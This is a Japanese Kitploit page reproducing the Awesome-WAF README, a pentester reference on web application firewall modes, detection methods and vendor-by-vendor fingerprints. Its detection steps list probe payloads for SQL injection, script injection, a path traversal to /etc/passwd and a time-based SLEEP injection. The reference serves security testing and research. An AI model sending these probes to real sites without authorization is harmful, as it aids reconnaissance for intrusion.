Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Awesome-WAF — セキュリティの観点から見るWebアプリケーションファイアウォール(WAF)のすべて!🔥 | Kitploit
ツール/GitHubGitHub/0xinfection/awesome-waf
WAFバイパスウェブセキュリティ学習と教育厳選リソースWAFバイパス 第4位
GitHub0xinfection/awesome-waf

Awesome-WAF

セキュリティの観点から見るWebアプリケーションファイアウォール(WAF)のすべて!🔥

リポジトリを見る
7.6k1.2k4914日前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Awesome WAF Awesome

Webアプリケーションファイアウォール(WAF)に関するセキュリティ観点のすべて。🔥

前書き: これは元々私自身のWAFに関するコレクションでした。ペネトレーションテスターや研究者の方々に役立つことを願い、オープンソース化しています。「コミュニティはお互いから学び合う」という言葉通りです。

メインロゴ

簡潔な定義: ファイアウォールとは、Webアプリケーションとクライアントエンドポイントの間に配置されたセキュリティポリシーの実施ポイントです。この機能はソフトウェアまたはハードウェアで実装され、アプライアンスデバイス上、または一般的なOSが動作する標準的なサーバー上で動作します。スタンドアロンデバイスとして、または他のネットワークコンポーネントに統合される場合もあります。(出典:PCI DSS IS 6.6)

Webアプリケーションファイアウォールは、ユーザーとWebアプリケーションの間に位置し、悪意のあるアクティビティがWebアプリケーションに到達するのを防ぐ役割を担います。WAFはリクエストの悪意のある部分をフィルタリングするか、単にブロックします。

ぜひコントリビュートしてください。

目次:

  • はじめに
    • WAFの仕組み
    • 動作モード
  • テスト手法
    • チェックすべき場所
    • 検出テクニック
  • WAFフィンガープリント
  • 回避テクニック
    • ファジング/ブルートフォース
    • 正規表現のリバース
    • 難読化/エンコーディング
    • ブラウザのバグ
    • HTTPヘッダースプーフィング
    • Google Dorksアプローチ
  • 既知のバイパス
  • 素晴らしいツール群
    • フィンガープリンティング
    • テスト
    • 回避
  • ブログ&レポート
  • ビデオプレゼンテーション
  • 研究プレゼンテーション&論文
    • 研究論文
    • プレゼンテーションスライド
  • ライセンス&クレジット

はじめに:

WAFの仕組み:

  • 一連のルールを使用して、正常なリクエストと悪意のあるリクエストを区別します。
  • 学習モードを使用して、ユーザーの行動を学習することでルールを自動的に追加する場合もあります。

動作モード:

  • ネガティブモデル(ブラックリストベース) - ブラックリストモデルは、事前に設定されたシグネチャを使用して、明らかに悪意のあるリクエストをブロックします。ネガティブモデルで動作するWAFのシグネチャは、特定のWebアプリケーションの脆弱性を悪用する攻撃を防ぐために特別に作成されています。ブラックリストモデルのWAFは、パブリックインターネットに公開されているWebアプリケーションに最適で、主要な脆弱性に対して非常に効果的です。例:<script>*</script> 入力をすべてブロックするルールは、基本的なクロスサイトスクリプティング攻撃を防ぎます。
  • ポジティブモデル(ホワイトリストベース) - ホワイトリストモデルは、特別に設定された基準に従ったWebトラフィックのみを許可します。例えば、特定のIPアドレスからのHTTP GETリクエストのみを許可するように設定できます。このモデルは、大規模な攻撃をブロックするのに非常に効果的ですが、多くの正当なトラフィックもブロックします。ホワイトリストモデルのファイアウォールは、限られたグループ(従業員など)のみが使用する内部ネットワーク上のWebアプリケーションに最適です。
  • 混合/ハイブリッドモデル(包括モデル) - ハイブリッドセキュリティモデルは、ホワイトリストとブラックリストの両方を組み合わせます。設定の詳細に応じて、ハイブリッドファイアウォールは内部ネットワーク上のWebアプリケーションとパブリックインターネット上のWebアプリケーションの両方に最適な選択肢となります。良いシナリオとしては、Webアプリケーションがパブリックインターネットに面している場合(ブラックリストを使用)と、管理パネルを一部のユーザーのみに公開する必要がある場合(ホワイトリストを使用)が考えられます。

テスト手法:

チェックすべき場所:

  • WAFを公開する一般的なポート(80、443、8000、8080、8888)に常に注意してください。ただし、WAFはHTTPサービスが動作する任意のポートに簡単にデプロイできることに注意が必要です。まずHTTPサービスポートを列挙し、その後でWAFを探すのが良いでしょう。
  • 一部のWAFはリクエストに独自のCookieを設定します(例:Citrix Netscaler、Yunsuo WAF)。
  • 一部のWAFは別個のヘッダーに関連付けられます(例:Anquanbao WAF、Amazon AWS WAF)。
  • 一部のWAFはヘッダーを変更し、文字を混同して攻撃者を混乱させることがよくあります(例:Netscaler、Big-IP)。
  • 一部のWAFはServerヘッダーに自身を公開します(例:Approach、WTS WAF)。
  • 一部のWAFはレスポンスコンテンツに自身を公開します(例:DotDefender、Armor、Sitelock)。
  • その他のWAFは、悪意のあるリクエストに対して異常なレスポンスコードを返します(例:WebKnight、360 WAF)。

検出テクニック:

WAFを特定するには、それを(ダミーで)誘発させる必要があります。

  1. ブラウザから通常のGETリクエストを送信し、インターセプトしてレスポンスヘッダー(特にCookie)を記録します。
  2. コマンドライン(例:cURL)からリクエストを送信し、レスポンスのコンテンツとヘッダーをテストします(ユーザーエージェントは含めない)。
  3. ランダムなオープンポートにGETリクエストを送信し、WAFの正体を暴露する可能性のあるバナーを取得します。
  4. ログインページで、" or 1 = 1 -- のような一般的な(簡単に検出可能な)ペイロードを注入します。
  5. 検索バー、問い合わせフォーム、その他の入力フィールドに <script>alert()</script> のようなノイズの多いペイロードを注入します。
  6. URLの最後にあるランダムなパラメータにダミーの ../../../etc/passwd を付加します。
  7. URLの最後の任意のパラメータに ' OR SLEEP(5) OR ' のようなキャッチーなキーワードを追加します。
  8. HTTP/0.9 のような古いプロトコルでGETリクエストを送信します(HTTP/0.9 はPOSTタイプのクエリをサポートしていません)。
  9. 多くの場合、WAFは異なる種類のインタラクションに応じて Server ヘッダーを変化させます。
  10. ドロップアクションテクニック - サーバーに対して生のFIN/RSTパケットを送信し、応答を特定します。

    ヒント: この方法は、HPing3 や Scapy などのツールで簡単に実現できます。

  11. サイドチャネル攻撃 - リクエストとレスポンスコンテンツのタイミング動作を調査します。

    ヒント: 詳細はこちらのブログ記事にあります。

WAFフィンガープリント

WAFのフィンガープリントを取得したいですか?方法を見てみましょう。

注意:このセクションには手動によるWAF検出テクニックが含まれています。次のセクションに進みたい場合はそちらへどうぞ。





## 回避技術 WAFをバイパスおよび回避するいくつかの方法を見てみましょう。 ```
ツールをダウンロード
WAF指紋
360
  • 検出容易度:容易
  • 検出方法:
    • 異常なリクエストに対してステータスコード493を返します。
    • ブロックページにwzws-waf-cgi/ディレクトリへの参照が含まれる場合があります。
    • ブロックされた応答ページのソースには以下が含まれる場合があります:
      • wangshan.360.cn URLへの参照。
      • Sorry! Your access has been intercepted because your links may threaten website security. テキスト断片。
    • 応答ヘッダーにX-Powered-By-360WZBヘッダーが含まれる場合があります。
    • ブロックされた応答ヘッダーに固有のヘッダーWZWS-Rayが含まれます。
    • Serverヘッダーに値qianxin-wafが含まれる場合があります。
aeSecure
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答コンテンツにaesecure_denied.png画像が含まれます(ソースを表示して確認)。
    • 応答ヘッダーにaeSecure-code値が含まれます。
Airlock
  • 検出容易度:中程度/困難
  • 検出方法:
    • Set-Cookieヘッダーには次のものが含まれる場合があります:
      • AL-SESSクッキーフィールド名(大文字小文字を区別しません)。
      • AL-LB値(大文字小文字を区別しません)。
    • ブロックされた応答ページには以下が含まれます:
      • Server detected a syntax error in your request テキスト。
      • Check your request and all parameters テキスト断片。
AlertLogic
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • We are sorry, but the page you are looking for cannot be found テキスト断片。
      • The page has either been removed, renamed or temporarily unavailable テキスト。
      • 赤文字で 404 Not Found。
Aliyundun
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • Sorry, your request has been blocked as it may cause potential threats to the server's security テキスト断片。
      • errors.aliyun.com サイトURLへの参照。
    • ブロックされた応答コードは 405 です。
Anquanbao
  • 検出容易度:容易
  • 検出方法:
    • 悪意のあるリクエストに対してブロックされたHTTP応答コード 405 を返します。
    • ブロックされた応答コンテンツに /aqb_cc/error/ または hidden_intercept_time が含まれる場合があります。
    • 応答ヘッダーに X-Powered-by-Anquanbao ヘッダーフィールドが含まれます。
Anyu
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答コンテンツに Sorry! your access has been intercepted by AnYu が含まれます。
    • ブロックされた応答ページに AnYu- the green channel テキストが含まれます。
    • 応答ヘッダーに異常なヘッダー WZWS-RAY が含まれる場合があります。
Approach
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのコンテンツには以下が含まれる場合があります:
      • Approach Web Application Firewall Framework 見出し。
      • Your IP address has been logged and this information could be used by authorities to track you. 警告。
      • Sorry for the inconvenience! キーワード。
      • Approach infrastructure team テキスト断片。
    • Serverヘッダーのフィールド値が Approach に設定されています。
Armor Defense
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答コンテンツには以下が含まれます:
      • This request has been blocked by website protection from Armor テキスト。
      • If you manage this domain please create an Armor support ticket 断片。
ArvanCloud
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに ArvanCloud キーワードが含まれます。
ASPA
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに ASPA-WAF キーワードが含まれます。
    • 応答に固有のヘッダー ASPA-Cache-Status とその内容 HIT または MISS が含まれます。
ASP.NET Generic
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーに X-ASPNET-Version ヘッダー値が含まれる場合があります。
    • ブロックされた応答ページのコンテンツには以下が含まれる場合があります:
      • This generic 403 error means that the authenticated user is not authorized to use the requested resource。
      • Error Code 0x00000000< キーワード。
    • X-Powered-Byヘッダーのフィールド値が ASP.NET に設定されています。
Astra
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのコンテンツには以下が含まれる場合があります:
      • Sorry, this is not allowed. が h1 にあります。
      • our website protection system has detected an issue with your IP address and wont let you proceed any further テキスト断片。
      • www.getastra.com/assets/images/ URLへの参照。
    • 応答クッキーにフィールド値 cz_astra_csrf_cookie が応答ヘッダーにあります。
AWS ELB
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーには以下が含まれる場合があります:
      • AWSALB クッキーフィールド値。
      • X-AMZ-ID ヘッダー。
      • X-AMZ-REQUEST-ID ヘッダー。
    • 応答ページには以下が含まれる場合があります:
      • キーワードに Access Denied。
      • RequestId タグ間の長さ20~25のリクエストトークンID。
    • Serverヘッダーフィールドに awselb/2.0 値が含まれます。
Baidu Yunjiasu
  • 検出容易度:中程度
  • 検出方法:
    • Serverヘッダーに Yunjiasu-nginx 値が含まれる場合があります。
    • Serverヘッダーに Yunjiasu 値が含まれる場合があります。
Barikode
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのコンテンツには以下が含まれます:
      • BARIKODE キーワード。
      • Forbidden Access テキスト断片が h1 にあります。
Barracuda
  • 検出容易度:中程度
  • 検出方法:
    • 応答クッキーに barra_counter_session 値が含まれる場合があります。
    • 応答ヘッダーに barracuda_ キーワードが含まれる場合があります。
  • 応答ページには以下が含まれます:
    • You have been blocked 見出し。
    • You are unable to access this website テキスト。
Bekchy
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ヘッダーに Bekchy - Access Denied が含まれます。
    • ブロックされた応答ページに https://bekchy.com/report への参照が含まれます。
BinarySec
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーには以下が含まれます:
      • X-BinarySec-Via フィールド。
      • X-BinarySec-NoCache フィールド。
      • Serverヘッダーに BinarySec キーワードが含まれます。
BitNinja
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページには以下が含まれる場合があります:
      • Security check by BitNinja テキスト断片。
      • your IP will be removed from BitNinja。
      • Visitor anti-robot validation テキスト断片。
      • (You will be challenged by a reCAPTCHA page) テキスト。
BIG-IP ASM
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーに BigIP または F5 キーワード値が含まれる場合があります。
    • 応答ヘッダーフィールドに X-WA-Info ヘッダーが含まれる場合があります。
    • 応答ヘッダーに乱れた X-Cnection フィールド値が含まれる場合があります。
BlockDos
  • 検出容易度:中程度
  • 検出方法:
    • Serverヘッダーに値 BlockDos.net が含まれます。
Bluedon IST
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに BDWAF フィールド値が含まれます。
    • ブロックされた応答ページに Bluedon Web Application Firewall テキスト断片が含まれます。
BulletProof Security Pro
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • idが bpsMessage の div テキスト断片。
      • If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page. テキスト断片。
CDN NS Application Gateway
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに CdnNsWAF Application Gateway テキスト断片が含まれます。
Cerber (WordPress)
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • We're sorry, you are not allowed to proceed テキスト断片。
      • Your request looks suspicious or similar to automated requests from spam posting software 警告。
Chaitin Safeline
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページにHTMLコメント内の event_id キーワードが含まれます。
ChinaCache
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに Powered-by-ChinaCache フィールドが含まれます。
Cisco ACE XML Gateway
  • 検出容易度:中程度
  • 検出方法:
    • Serverヘッダーの値が ACE XML Gateway に設定されています。
Cloudbric
  • 検出容易度:中程度
  • 検出方法:
    • 応答コンテンツには以下が含まれます:
      • Malicious Code Detected 見出し。
      • Your request was blocked by Cloudbric テキスト断片。
      • https://cloudbric.zendesk.com URLへの参照。
      • Cloudbric Help Center テキスト。
      • Cloudbric | ERROR! で始まるページタイトル。
Cloudflare
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに cf-ray フィールド値が含まれる場合があります。
    • Serverヘッダーフィールドの値が cloudflare。
    • Set-Cookie 応答ヘッダーに __cfuid= クッキーフィールドがあります。
    • ページコンテンツに Attention Required! または Cloudflare Ray ID: が含まれる場合があります。
    • ページコンテンツにテキストとして DDoS protection by Cloudflare が含まれる場合があります。
    • 無効なURLにアクセスすると CLOUDFLARE_ERROR_500S_BOX が発生する場合があります。
CloudfloorDNS
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーフィールドの値が CloudfloorDNS WAF。
    • ブロックページのタイトルに CloudfloorDNS - Web Application Firewall Error が含まれる場合があります。
    • ページコンテンツにコンタクトリンクとして www.cloudfloordns.com/contact URLが含まれる場合があります。
Cloudfront
  • 検出容易度:容易
  • 検出方法:
    • 悪意のあるリクエストに対して、ブロックされた応答コンテンツに Generated by cloudfront (CloudFront) エラーが含まれます。
Comodo cWatch
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに Protected by COMODO WAF 値が含まれます。
CrawlProtect
  • 検出容易度:容易
  • 検出方法:
    • 応答クッキーに crawlprotect クッキー名が含まれる場合があります。
    • ブロックページのタイトルに CrawlProtect キーワードが含まれます。
    • 悪意のあるリクエストに対して、ブロックされた応答コンテンツに値
      This site is protected by CrawlProtect !!! が含まれます。
Deny-All
  • 検出容易度:困難
  • 検出方法:
    • 応答コンテンツに値 Condition Intercepted が含まれます。
    • Set-Cookie ヘッダーにクッキーフィールド sessioncookie が含まれます。
Distil Web Protection
  • 検出容易度:容易
  • 検出方法:
    • すべてのリクエストで応答ヘッダーにフィールド値 X-Distil-CS が含まれます。
    • ブロックされた応答ページには以下が含まれます:
      • Pardon Our Interruption... 見出し。
      • You have disabled javascript in your browser. テキスト断片。
      • Something about your browser made us think that you are a bot. テキスト。
DoSArrest Internet Security
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーにフィールド値 X-DIS-Request-ID が含まれます。
    • Serverヘッダーに DOSarrest キーワードが含まれます。
DotDefender
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答コンテンツに値
      dotDefender Blocked Your Request が含まれます。
    • ブロックされた応答ヘッダーに X-dotDefender-denied フィールド値が含まれます。
DynamicWeb Injection Check
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ヘッダーに X-403-Status-By フィールドとその値 dw-inj-check が含まれます。
e3Learning Security
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに e3Learning_WAF キーワードが含まれます。
EdgeCast (Verizon)
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答コンテンツに値
      Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon) が含まれます。
    • 悪意のあるリクエストに対してブロックされた応答コード 400 Bad Request が返されます。
Eisoo Cloud
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのコンテンツには以下が含まれる場合があります:
      • /eisoo-firewall-block.css 参照。
      • www.eisoo.com URL。
      • © (year) Eisoo Inc. キーワード。
    • Serverヘッダーのフィールド値が EisooWAF-AZURE/EisooWAF に設定されています。
Expression Engine
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページは通常 Invalid URI を返します。
    • 悪意のあるGETクエリに対して、ブロックされた応答コンテンツに値 Invalid GET Request が含まれます。
    • ブロックされたPOSTタイプのクエリには、応答コンテンツに Invalid Data が含まれます。
F5 ASM
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答コンテンツに警告
      The requested URL was rejected. Please consult with your administrator. が含まれます。
FortiWeb
  • 検出容易度:中程度
  • 検出方法:
    • 悪意のあるリクエストに対して応答ヘッダーに FORTIWAFSID= が含まれます。
    • ブロックされた応答ページには以下が含まれます:
      • .fgd_icon 画像アイコンへの参照。
      • Server Unavailable! 見出し。
      • Server unavailable. Please visit later. テキスト。
GoDaddy
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに値
      Access Denied - GoDaddy Website Firewall が含まれます。
GreyWizard
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • タイトルに Grey Wizard。
      • Contact the website owner or Grey Wizard テキスト断片。
      • We've detected attempted attack or non standard traffic from your IP address テキスト断片。
    • Serverヘッダーに greywizard キーワードが含まれます。
Huawei Cloud
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • account.hwclouds.com/static/error/images/404img.jpg エラー画像への参照。
      • www.hwclouds.com URLへの参照。
      • hws_security@{site.tld} 報告用メールへの参照。
HyperGuard
  • 検出容易度:困難
  • 検出方法:
    • Set-Cookie ヘッダーの応答ヘッダーにクッキーフィールド ODSESSION= があります。
IBM DataPower
  • 検出容易度:困難
  • 検出方法:
    • 応答ヘッダーにフィールド値 X-Backside-Transport とその値 OK または FAIL が含まれます。
Imperva Incapsula
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのコンテンツには以下が含まれる場合があります:
      • Powered By Incapsula テキスト断片。
      • Incapsula incident ID キーワード。
      • _Incapsula_Resource キーワード。
      • subject=WAF Block Page キーワード。
    • 通常のGETリクエストヘッダーに visid_incap 値が含まれます。
    • 応答ヘッダーに X-Iinfo ヘッダーフィールド名が含まれる場合があります。
    • Set-Cookie ヘッダーにクッキーフィールド incap_ses と visid_incap があります。
Imunify360
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに imunify360-webshield キーワードが含まれます。
    • 応答ページには以下が含まれます:
      • Powered by Imunify360 テキスト断片。
      • 応答タイプがJSONの場合、imunify360 preloader。
    • ブロックされた応答ページに protected by Imunify360 テキストが含まれます。
IndusGuard
  • 検出容易度:中程度
  • 検出方法:
    • Serverヘッダーに値 IF_WAF が含まれます。
    • ブロックされた応答コンテンツに警告
      further investigation and remediation with a screenshot of this page. が含まれます。
    • 応答ヘッダーに固有のヘッダー X-Version が含まれます。
Instart DX
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに固有のヘッダー X-Instart-Request-ID が含まれます。
    • 応答ヘッダーに固有のヘッダー指紋 X-Instart-WL が含まれます。
    • 応答ヘッダーに固有のヘッダー指紋 X-Instart-Cache が含まれます。
    • ブロックされた応答ページに The requested URL was rejected. Please consult with your administrator. テキストが含まれます。
ISA Server
  • 検出容易度:困難
  • 検出方法:
    • 応答ページには以下が含まれます:
      • The ISA Server denied the specified Uniform Resource Locator (URL) テキスト断片。
      • The server denied the specified Uniform Resource Locator (URL). Contact the server administrator. テキスト断片。
Janusec Application Gateway
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに JANUSEC の名前とロゴを表示する画像があります。
    • 悪意のあるリクエストに対して、ブロックされた応答ページに Janusec Application Gateway が表示されます。
Jiasule
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに static.jiasule.com/static/js/http_error.js URLへの参照が含まれます。
    • Set-Cookie ヘッダーの応答ヘッダーにクッキーフィールド _jsluid= または jsl_tracking があります。
    • Serverヘッダーに jiasule-WAF キーワードがあります。
    • ブロックされた応答コンテンツに notice-jiasule キーワードがあります。
KeyCDN
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに KeyCDN キーワードが含まれます。
KnownSec
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに ks-waf-error.png 画像が表示されます(ソースを表示して確認)。
KONA Site Defender (Akamai)
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに AkamaiGHost キーワードが含まれます。
LiteSpeed
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーの値が LiteSpeed に設定されています。
    • 応答ページには以下が含まれます:
      • Proudly powered by LiteSpeed Web Server テキスト。
      • http://www.litespeedtech.com/error-page への参照。
      • Access to resource on this server is denied.
Malcare
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答ページには以下が含まれる場合があります:
      • Blocked because of Malicious Activities テキスト断片。
      • Firewall powered by MalCare テキスト断片。
MissionControl Application Shield
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーフィールドに Mission Control Application Shield 値が含まれます。
ModSecurity
  • 検出容易度:中程度/困難
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • This error was generated by Mod_Security テキスト断片。
      • One or more things in your request were suspicious テキスト断片。
      • rules of the mod_security module テキスト断片。
      • mod_security rules triggered テキスト断片。
      • /modsecurity-errorpage/ ディレクトリへの参照。
    • Serverヘッダーに Mod_Security または NYOB キーワードが含まれる場合があります。
    • 攻撃に対する応答コードが 403 で、応答フレーズが ModSecurity Action の場合があります。
ModSecurity CRS
  • 検出容易度:困難
  • 検出方法:
    • 特定のパラノイアレベルに設定された場合に、別のリクエストヘッダー X-Scanner を追加するとブロックページが発生します。
NAXSI
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに This Request Has Been Blocked By NAXSI が含まれます。
    • 応答ヘッダーに異常なフィールド X-Data-Origin とその値 naxsi/waf キーワードが含まれます。
    • Serverヘッダーに naxsi/waf キーワード値が含まれます。
    • ブロックされた応答ページに NAXSI blocked information エラーコードが含まれる場合があります。
Nemesida
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページに Suspicious activity detected. Access to the site is blocked. が含まれます。
    • メール nwaf@{site.tld} への参照が含まれます。
Netcontinuum
  • 検出容易度:中程度
  • 検出方法:
    • セッションクッキーに NCI__SessionId= クッキーフィールド名が含まれます。
NetScaler AppFirewall
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーには以下が含まれる場合があります:
      • Connection: ヘッダーフィールド名が nnCoection: に乱れている。
      • ns_af= クッキーフィールド名。
      • citrix_ns_id フィールド名。
      • NSC キーワード。
      • NS-CACHE フィールド値。
NevisProxy
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーのクッキーに Navajo キーワードが含まれます。
NewDefend
  • 検出容易度:容易
  • 検出方法:
    • 応答ページには以下が含まれます:
      • http://www.newdefend.com/feedback/misinformation/ URLへの参照。
      • /nd_block/ ディレクトリへの参照。
    • Serverヘッダーに NewDefend キーワードが含まれます。
Nexusguard
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに speresources.nexusguard.com/wafpage/index.html URLへの参照があります。
NinjaFirewall
  • 検出容易度:中程度
  • 検出方法:
    • 応答ページのタイトルに NinjaFirewall: 403 Forbidden が含まれます。
    • 応答ページには以下が含まれます:
      • For security reasons, it was blocked and logged テキスト断片。
      • タイトルに NinjaFirewall キーワード。
    • 悪意のあるリクエストに対して 403 Forbidden 応答を返します。
NSFocus
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに NSFocus キーワードが含まれます。
NullDDoS
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード NullDDoS System が含まれます。
onMessage Shield
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーにヘッダーフィールド X-Engine とその値 onMessage Shield が含まれます。
    • ブロックされた応答ページには以下が含まれます:
      • Blackbaud K-12 conducts routine maintenance キーワード。
      • This site is protected by an enhanced security system。
      • https://status.blackbaud.com URLへの参照。
      • https://maintenance.blackbaud.com URLへの参照。
OpenResty Lua WAF
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード openresty/{version} が含まれます。
    • ブロックされた応答ページにテキスト openresty/{version} が含まれます。
    • ブロックされた応答コードが 406 Not Acceptable で返されます。
Palo Alto
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答ページに Virus/Spyware Download Blocked が含まれます。
    • 応答ページに Palo Alto Next Generation Security Platform テキスト断片が含まれる場合があります。
PentaWAF
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード PentaWAF/{version} が含まれます。
    • ブロックされた応答ページにテキスト PentaWAF/{version} が含まれます。
PerimeterX
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに https://www.perimeterx.com/whywasiblocked URLへの参照が含まれます。
pkSecurityModule IDS
  • 検出容易度:中程度
  • 検出方法:
    • 応答コンテンツには以下が含まれる場合があります:
      • pkSecurityModule: Security.Alert。
      • A safety critical request was discovered and blocked テキスト断片。
Positive Technologies Application Firewall
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページに Forbidden が h1 にあり、その後に以下が続きます:
    • Request ID: がフォーマット yyyy-mm-dd-hh-mm-ss-{ref. code} で表示されます。
PowerCDN
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーには以下が含まれる場合があります:
      • Via ヘッダーとその内容 powercdn.com。
      • X-Cache ヘッダーとその内容 powercdn.com。
      • X-CDN ヘッダーとその内容 PowerCDN。
Profense
  • 検出容易度:容易
  • 検出方法:
    • Set-Cookie ヘッダーにクッキーフィールド名 PLBSID= が含まれます。
    • Serverヘッダーにキーワード Profense が含まれます。
Proventia (IBM)
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページに request does not match Proventia rules テキスト断片が含まれる場合があります。
Puhui
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード PuhuiWAF が含まれます。
Qiniu CDN
  • 検出容易度:容易
  • 検出方法:
    • 応答コンテンツには以下が含まれる場合があります:
      • 応答ヘッダーに異常なヘッダー X-Qiniu-CDN とその値が 0 または 1 に設定されています。
Radware Appwall
  • 検出容易度:中程度
  • 検出方法:
    • 応答ページに以下のテキスト断片が含まれます:
      Unauthorized Activity Has Been Detected. と Case Number
    • ブロックされた応答ページにメール radwarealerting@{site.tld} への参照があります。
    • ブロックされた応答ページのタイトルが Unauthorized Request Blocked に設定されています。
    • 応答ヘッダーに X-SL-CompState ヘッダーフィールド名が含まれる場合があります。
Reblaze
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーのクッキーにヘッダーフィールド名 rbzid= が含まれます。
    • Serverフィールド値にテキスト断片 Reblaze Secure Web Gateway が含まれる場合があります。
    • 応答ページには以下が含まれます:
      • 太字で Access Denied (403)。
      • Current session has been terminated テキスト。
      • For further information, do not hesitate to contact us。
Request Validation Mode
  • 検出容易度:容易
  • 検出方法:
    • 特にASP.NETウェブサイトでのみ見られるファイアウォール。
    • 応答ページに以下のテキスト断片のいずれかが含まれます:
      • ASP.NET has detected data in the request that is potentially dangerous.
      • Request Validation has detected a potentially dangerous client input value.
      • HttpRequestValidationException.
    • ブロックされた応答コードは常に 500 Internal Error です。
RSFirewall
  • 検出容易度:容易
  • 検出方法:
    • 応答ページには以下が含まれます:
      • COM_RSFIREWALL_403_FORBIDDEN キーワード。
      • COM_RSFIREWALL_EVENT キーワード。
Sabre
  • 検出容易度:容易
  • 検出方法:
    • 悪意のあるリクエストに対してステータスコード 500 Internal Error を返します。
    • 応答コンテンツには以下があります:
      • 連絡メール [email protected]。
      • Your request has been blocked 太字警告。
      • clicking the above email link will automatically add some important details to the email for us to investigate the problem テキスト断片。
Safe3
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーには以下が含まれます:
      • X-Powered-By ヘッダーのフィールド値が Safe3WAF。
      • Serverヘッダーのフィールド値が Safe3 Web Firewall に設定されています。
    • 応答ページにキーワード Safe3waf が含まれます。
SafeDog
  • 検出容易度:容易/中程度
  • 検出方法:
    • 応答の Serverヘッダーには以下が含まれる場合があります:
      • WAF/2.0 キーワード。
      • safedog フィールド値。
SecKing
  • 検出容易度:容易/中程度
  • 検出方法:
    • 応答の Serverヘッダーには以下が含まれる場合があります:
      • SECKINGWAF キーワード。
      • SECKING/{version} フィールド値。
SecuPress
  • 検出容易度:容易
  • 検出方法:
    • 応答コンテンツには以下が含まれる場合があります:
      • テキストとして SecuPress。
      • テキストとして Block ID: Bad URL Contents。
    • 応答コードが 503 Service Unavailable で返されます。
Secure Entry
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーの値が Secure Entry Server に設定されています。
SecureIIS
  • 検出容易度:容易
